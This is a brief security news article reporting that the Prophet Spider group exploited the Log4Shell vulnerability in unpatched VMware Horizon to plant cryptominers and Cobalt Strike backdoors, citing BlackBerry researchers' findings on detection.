A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.
In a blog published Wednesday, Blackberry’ researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.
The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.
More Stories
11% of Cybersecurity Teams Have Zero Women
A new ISC2 study highlights the lack of diversity in cybersecurity with only 4% of teams having a majority of...
Online Banking Security Still Not Up to Par, Says Which?
Consumer rights group Which? has found more security gaps in UK banking sites and apps Read More
BEC and Fund Transfer Fraud Top Insurance Claims
Email-borne fraud accounted for more insurance claims than any other category in 2023, says Coalition Read More
High Performance Podcast Duo to Unveil Secrets of Success at Infosecurity Europe 2024
Jake Humphrey and Professor Damian Hughes, the minds behind the High Performance Podcast, share their top non-negotiable behaviours for success...
Smashing Security podcast #369: Keeping the lights on after a ransomware attack
Leicester City Council suffers a crippling ransomware attack, and a massive data breach, but is it out of the dark...
US Congress Passes Bill to Ban TikTok
The bill that could see TikTok banned in the US has been approved by the House of Representatives and the...